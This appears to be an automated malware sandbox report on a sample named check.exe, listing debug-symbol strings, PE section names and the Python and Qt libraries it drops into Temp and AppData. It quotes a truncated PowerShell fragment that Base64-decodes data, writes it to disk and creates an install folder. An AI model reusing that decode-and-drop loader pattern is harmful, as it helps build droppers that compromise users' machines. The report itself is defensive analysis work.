ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: check.exe, 00000005.00000002.2749724831.00007FF89F1D2000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: check.exe, 00000004.00000003.2254086538.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2763315652.00007FF8BFBA4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.2206358241.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762439180.00007FF8BA4F5000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.2254233123.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb%% source: check.exe, 00000005.00000002.2760252195.00007FF8B8277000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb source: check.exe, 00000005.00000002.2760252195.00007FF8B8277000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: check.exe, 00000005.00000002.2763117904.00007FF8BFB73000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: check.exe, 00000004.00000003.2254830143.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2761899392.00007FF8B8CB6000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.2223434926.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbT source: check.exe, 00000005.00000002.2750673646.00007FF89F7A6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: check.exe, 00000005.00000002.2743333905.00007FF89DF9A000.00000002.00000001.01000000.00000024.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762068252.00007FF8B90EB000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: check.exe, 00000004.00000003.2254329878.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762795539.00007FF8BA51D000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2760981184.00007FF8B8319000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: check.exe, 00000005.00000002.2758624413.00007FF89FF78000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: check.exe, 00000004.00000003.2254233123.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.2205718666.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdbBB source: check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platformthemes\qxdgdesktopportal.pdb source: check.exe, 00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2747911281.00007FF89ED47000.00000002.00000001.01000000.00000020.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: check.exe, 00000004.00000003.2195204413.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762606642.00007FF8BA503000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: check.exe, 00000005.00000002.2749724831.00007FF89F26A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: check.exe, 00000005.00000002.2748572981.00007FF89EDD5000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: check.exe, 00000005.00000002.2750673646.00007FF89F7A6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdb source: check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qgif.pdb source: check.exe, 00000004.00000003.2222491102.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtga.pdb source: check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.2254086538.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2763315652.00007FF8BFBA4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: check.exe, 00000005.00000002.2749724831.00007FF89F26A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qicns.pdb source: check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762283867.00007FF8B9843000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762068252.00007FF8B90EB000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: check.exe, 00000004.00000003.2255084714.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2761734389.00007FF8B8C13000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: check.exe, 00000005.00000002.2744275585.00007FF89E59A000.00000002.00000001.01000000.00000023.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platforms\qwindows.pdb source: check.exe, 00000005.00000002.2741705628.00007FF89D8B4000.00000002.00000001.01000000.00000026.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: check.exe, 00000004.00000003.2259702970.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2735934243.0000029FD7590000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qwbmp.pdb source: check.exe, 00000004.00000003.2224216053.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\libEGL.pdb source: check.exe, 00000004.00000003.2208243247.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: check.exe, 00000005.00000002.2748572981.00007FF89EDD5000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: check.exe, 00000005.00000002.2760756443.00007FF8B82EE000.00000002.00000001.01000000.00000019.sdmp

Data Obfuscation

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String(${random_encoded_data});[System.IO.File]::WriteAllBytes(${random_archive_file},${random_decoded_bytes});${random_new_item}=New-Item -ItemType Directory -Path ${random_install_path};tr
Source: VCRUNTIME140.dll.4.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
Source: MSVCP140.dll.4.drStatic PE information: section name: .didat
Source: Qt5Core.dll.4.drStatic PE information: section name: .qtmimed
Source: VCRUNTIME140.dll.4.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.4.drStatic PE information: section name: _RDATA
Source: VCRUNTIME140.dll0.4.drStatic PE information: section name: _RDATA
Source: opengl32sw.dll.4.drStatic PE information: section name: _RDATA
Source: qtuiotouchplugin.dll.4.drStatic PE information: section name: .qtmetad
Source: qsvgicon.dll.4.drStatic PE information: section name: .qtmetad
Source: qgif.dll.4.drStatic PE information: section name: .qtmetad
Source: qicns.dll.4.drStatic PE information: section name: .qtmetad
Source: qico.dll.4.drStatic PE information: section name: .qtmetad
Source: qjpeg.dll.4.drStatic PE information: section name: .qtmetad
Source: qsvg.dll.4.drStatic PE information: section name: .qtmetad
Source: qtga.dll.4.drStatic PE information: section name: .qtmetad
Source: qtiff.dll.4.drStatic PE information: section name: .qtmetad
Source: qwbmp.dll.4.drStatic PE information: section name: .qtmetad
Source: qwebp.dll.4.drStatic PE information: section name: .qtmetad
Source: libcrypto-3.dll.4.drStatic PE information: section name: .00cfg
Source: libssl-3.dll.4.drStatic PE information: section name: .00cfg
Source: python313.dll.4.drStatic PE information: section name: PyRuntim
Source: qminimal.dll.4.drStatic PE information: section name: .qtmetad
Source: qoffscreen.dll.4.drStatic PE information: section name: .qtmetad
Source: qwebgl.dll.4.drStatic PE information: section name: .qtmetad
Source: qwindows.dll.4.drStatic PE information: section name: .qtmetad
Source: qxdgdesktopportal.dll.4.drStatic PE information: section name: .qtmetad
Source: qwindowsvistastyle.dll.4.drStatic PE information: section name: .qtmetad
Source: VCRUNTIME140.dll.6.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.6.drStatic PE information: section name: _RDATA
Source: MSVCP140.dll.6.drStatic PE information: section name: .didat
Source: Qt5Core.dll.6.drStatic PE information: section name: .qtmimed
Source: libcrypto-3.dll.6.drStatic PE information: section name: .00cfg
Source: libssl-3.dll.6.drStatic PE information: section name: .00cfg
Source: VCRUNTIME140.dll0.6.drStatic PE information: section name: _RDATA
Source: python313.dll.6.drStatic PE information: section name: PyRuntim
Source: opengl32sw.dll.6.drStatic PE information: section name: _RDATA
Source: qtuiotouchplugin.dll.6.drStatic PE information: section name: .qtmetad
Source: qsvgicon.dll.6.drStatic PE information: section name: .qtmetad
Source: qgif.dll.6.drStatic PE information: section name: .qtmetad
Source: qicns.dll.6.drStatic PE information: section name: .qtmetad
Source: qico.dll.6.drStatic PE information: section name: .qtmetad
Source: qjpeg.dll.6.drStatic PE information: section name: .qtmetad
Source: qsvg.dll.6.drStatic PE information: section name: .qtmetad
Source: qtga.dll.6.drStatic PE information: section name: .qtmetad
Source: qtiff.dll.6.drStatic PE information: section name: .qtmetad
Source: qwbmp.dll.6.drStatic PE information: section name: .qtmetad
Source: qwebp.dll.6.drStatic PE information: section name: .qtmetad
Source: qminimal.dll.6.drStatic PE information: section name: .qtmetad
Source: qoffscreen.dll.6.drStatic PE information: section name: .qtmetad
Source: qwebgl.dll.6.drStatic PE information: section name: .qtmetad
Source: qwindows.dll.6.drStatic PE information: section name: .qtmetad
Source: qxdgdesktopportal.dll.6.drStatic PE information: section name: .qtmetad
Source: qwindowsvistastyle.dll.6.drStatic PE information: section name: .qtmetad
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89A6BD5E4 push rbx; retn 0000h14_2_00007FF89A6BD5F5
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 22_2_00007FF898C0D5E4 push rbx; retn 0000h22_2_00007FF898C0D5F5
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\MSVCP140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\QtGui.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Widgets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\libssl-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\libffi-8.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Widgets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\MSVCP140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
